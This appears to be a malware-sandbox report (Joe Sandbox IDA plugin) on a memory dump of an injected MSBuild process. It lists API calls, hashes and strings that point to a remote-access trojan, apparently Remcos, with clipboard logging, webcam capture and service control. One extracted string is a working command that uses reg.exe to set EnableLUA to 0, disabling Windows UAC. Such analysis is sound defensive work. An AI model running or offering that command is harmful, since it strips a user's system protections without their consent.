• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered$`#v
• API String ID: 614609389-3049340936
• Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
• Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
• Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
• Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
APIs
• __allrem.LIBCMT ref: 00439789
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
• __allrem.LIBCMT ref: 004397BC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
• __allrem.LIBCMT ref: 004397F1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
• Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
• Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
• Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4189289331-0
                                                                                                                        • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                                                        • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                                        • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                                                        • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __freea$__alloca_probe_16
                                                                                                                        • String ID: a/p$am/pm
                                                                                                                        • API String ID: 3509577899-3206640213
                                                                                                                        • Opcode ID: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                                                        • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                                        • Opcode Fuzzy Hash: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                                                        • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                          • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prologSleep
                                                                                                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                                        • API String ID: 3469354165-462540288
                                                                                                                        • Opcode ID: 6d6b6c617a36415e3d62c7ab1bf0d5ca04a15291306e93b380526c2cac81f15c
                                                                                                                        • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                                        • Opcode Fuzzy Hash: 6d6b6c617a36415e3d62c7ab1bf0d5ca04a15291306e93b380526c2cac81f15c
                                                                                                                        • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 493672254-0
                                                                                                                        • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                                        • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                                        • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                                        • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3852720340-0
                                                                                                                        • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                        • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                                        • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                        • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                        • _free.LIBCMT ref: 00446EF6
                                                                                                                        • _free.LIBCMT ref: 00446F1E
                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                        • _abort.LIBCMT ref: 00446F3D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3160817290-0
                                                                                                                        • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                        • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                                        • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                        • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 221034970-0
                                                                                                                        • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                                        • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                                        • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                                        • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 221034970-0
                                                                                                                        • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                                        • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                                        • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                                        • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 221034970-0
                                                                                                                        • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                                        • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                                        • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                                        • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                                        APIs
                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Enum$InfoQueryValue
                                                                                                                        • String ID: [regsplt]$DG
                                                                                                                        • API String ID: 3554306468-1089238109
                                                                                                                        • Opcode ID: 6f7bd9bebdea3cfaa5ac79ccd65013da005c6902dca7ebe2f9e4052a80e7bc07
                                                                                                                        • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                                        • Opcode Fuzzy Hash: 6f7bd9bebdea3cfaa5ac79ccd65013da005c6902dca7ebe2f9e4052a80e7bc07
                                                                                                                        • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                          • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                          • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                          • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                          • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                        • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                                        • API String ID: 2974294136-753205382
                                                                                                                        • Opcode ID: bca9ad32993b86923eeb38013af920eef3518a691af4397d372f46d406baa9cc
                                                                                                                        • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                                        • Opcode Fuzzy Hash: bca9ad32993b86923eeb38013af920eef3518a691af4397d372f46d406baa9cc
                                                                                                                        • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                        • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                        • String ID: `AG
                                                                                                                        • API String ID: 1958988193-3058481221
                                                                                                                        • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                                        • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                        • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                                        • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                        APIs
                                                                                                                        • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                        • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                        • String ID: 0$MsgWindowClass
                                                                                                                        • API String ID: 2877667751-2410386613
                                                                                                                        • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                        • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                                        • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                        • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                        Strings
                                                                                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                        • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$CreateProcess
                                                                                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                        • API String ID: 2922976086-4183131282
                                                                                                                        • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                        • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                                        • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                        • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                        • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                                        • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                        • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                                        • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValue
                                                                                                                        • String ID: pth_unenc$BG
                                                                                                                        • API String ID: 1818849710-2233081382
                                                                                                                        • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                                        • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                        • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                                        • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                        APIs
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00404AF9
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404B04
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00404B0D
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                        • String ID: KeepAlive | Disabled
                                                                                                                        • API String ID: 2993684571-305739064
                                                                                                                        • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                                        • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                                        • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                                        • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                                        Strings
                                                                                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                        • API String ID: 3024135584-2418719853
